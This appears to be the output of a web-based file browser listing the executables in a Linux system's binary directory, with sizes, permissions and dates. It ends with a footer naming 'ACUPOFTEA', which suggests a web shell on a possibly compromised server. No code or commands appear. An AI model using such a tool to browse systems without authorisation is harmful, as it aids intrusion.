2025-12-18 07:31:24
x86_64-linux-gnu-gcc
application/x-executable
906.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gcc-11
application/x-executable
906.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gcc-ar
application/x-executable
26.54 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gcc-ar-11
application/x-executable
26.54 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gcc-nm
application/x-executable
26.54 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gcc-nm-11
application/x-executable
26.54 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gcc-ranlib
application/x-executable
26.54 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gcc-ranlib-11
application/x-executable
26.54 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gcov
application/x-executable
400.01 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gcov-11
application/x-executable
400.01 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gcov-dump
application/x-executable
251.84 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gcov-dump-11
application/x-executable
251.84 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gcov-tool
application/x-executable
275.93 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gcov-tool-11
application/x-executable
275.93 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-gold
application/x-pie-executable
3.04 MB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-gprof
application/x-pie-executable
111.79 KB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-ld
application/x-pie-executable
1.66 MB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-ld.bfd
application/x-pie-executable
1.66 MB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-ld.gold
application/x-pie-executable
3.04 MB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-lto-dump-11
application/x-executable
23.73 MB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-nm
application/x-pie-executable
43.63 KB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-objcopy
application/x-pie-executable
162.54 KB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-objdump
application/x-pie-executable
365.13 KB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-ranlib
application/x-pie-executable
54.48 KB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-readelf
application/x-pie-executable
758.44 KB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-size
application/x-pie-executable
30.45 KB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-strings
application/x-pie-executable
30.61 KB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-strip
application/x-pie-executable
162.57 KB
-rwxr-xr-x
2025-12-03 03:08:01
xargs
application/x-pie-executable
62.41 KB
-rwxr-xr-x
2022-03-23 01:52:12
xauth
application/x-pie-executable
54.96 KB
-rwxr-xr-x
2022-03-25 09:53:50
xbmtopbm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
xdg-user-dir
text/x-shellscript
234 B
-rwxr-xr-x
2022-03-25 09:54:00
xdg-user-dirs-update
application/x-pie-executable
26.23 KB
-rwxr-xr-x
2022-03-25 09:54:00
ximtoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
xpmtoppm
application/x-pie-executable
18.08 KB
-rwxr-xr-x
2021-02-07 06:32:35
xsubpp
text/x-perl
5.05 KB
-rwxr-xr-x
2026-06-23 08:11:00
xvminitoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
xwdtopnm
application/x-pie-executable
22.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
xxd
application/x-pie-executable
18.28 KB
-rwxr-xr-x
2026-07-13 07:08:21
xz
application/x-pie-executable
82.52 KB
-rwxr-xr-x
2026-05-28 04:06:40
xzcat
application/x-pie-executable
82.52 KB
-rwxr-xr-x
2026-05-28 04:06:40
xzcmp
text/x-shellscript
6.86 KB
-rwxr-xr-x
2026-05-28 04:06:40
xzdiff
text/x-shellscript
6.86 KB
-rwxr-xr-x
2026-05-28 04:06:40
xzegrep
text/x-shellscript
5.87 KB
-rwxr-xr-x
2026-05-28 04:06:40
xzfgrep
text/x-shellscript
5.87 KB
-rwxr-xr-x
2026-05-28 04:06:40
xzgrep
text/x-shellscript
5.87 KB
-rwxr-xr-x
2026-05-28 04:06:40
xzless
text/x-shellscript
1.76 KB
-rwxr-xr-x
2026-05-28 04:06:40
xzmore
text/x-shellscript
2.11 KB
-rwxr-xr-x
2026-05-28 04:06:40
ybmtopbm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
yes
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2026-01-23 10:51:17
ypdomainname
application/x-pie-executable
22.23 KB
-rwxr-xr-x
2022-03-23 01:57:59
yuvsplittoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
yuvtoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
zcat
text/x-shellscript
1.94 KB
-rwxr-xr-x
2026-07-03 11:55:53
zcmp
text/x-shellscript
1.64 KB
-rwxr-xr-x
2026-07-03 11:55:53
zdiff
text/x-shellscript
5.75 KB
-rwxr-xr-x
2026-07-03 11:55:53
zdump
application/x-pie-executable
26.21 KB
-rwxr-xr-x
2026-07-24 12:11:17
zegrep
text/x-shellscript
29 B
-rwxr-xr-x
2026-07-03 11:55:53
zeisstopnm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
zfgrep
text/x-shellscript
29 B
-rwxr-xr-x
2026-07-03 11:55:53
zforce
text/x-shellscript
2.03 KB
-rwxr-xr-x
2026-07-03 11:55:53
zgrep
text/x-shellscript
7.91 KB
-rwxr-xr-x
2026-07-03 11:55:53
zipdetails
text/x-perl
58.66 KB
-rwxr-xr-x
2026-06-23 08:11:00
zipgrep
text/x-shellscript
2.89 KB
-rwxr-xr-x
2024-02-01 03:52:55
zipinfo
application/x-pie-executable
170.42 KB
-rwxr-xr-x
2024-02-01 03:52:55
zless
text/x-shellscript
2.15 KB
-rwxr-xr-x
2026-07-03 11:55:53
zmore
text/x-shellscript
1.8 KB
-rwxr-xr-x
2026-07-03 11:55:53
znew
text/x-shellscript
4.47 KB
-rwxr-xr-x
2026-07-03 11:55:53
zstd
application/x-pie-executable
854.59 KB
-rwxr-xr-x
2022-03-24 04:15:58
zstdcat
application/x-pie-executable
854.59 KB
-rwxr-xr-x
2022-03-24 04:15:58
zstdgrep
text/x-shellscript
3.78 KB
-rwxr-xr-x
2022-03-24 04:15:58
zstdless
text/x-shellscript
30 B
-rwxr-xr-x
2022-03-24 04:15:58
zstdmt
application/x-pie-executable
854.59 KB
-rwxr-xr-x
2022-03-24 04:15:58
~ ACUPOFTEA - www.loginstore.com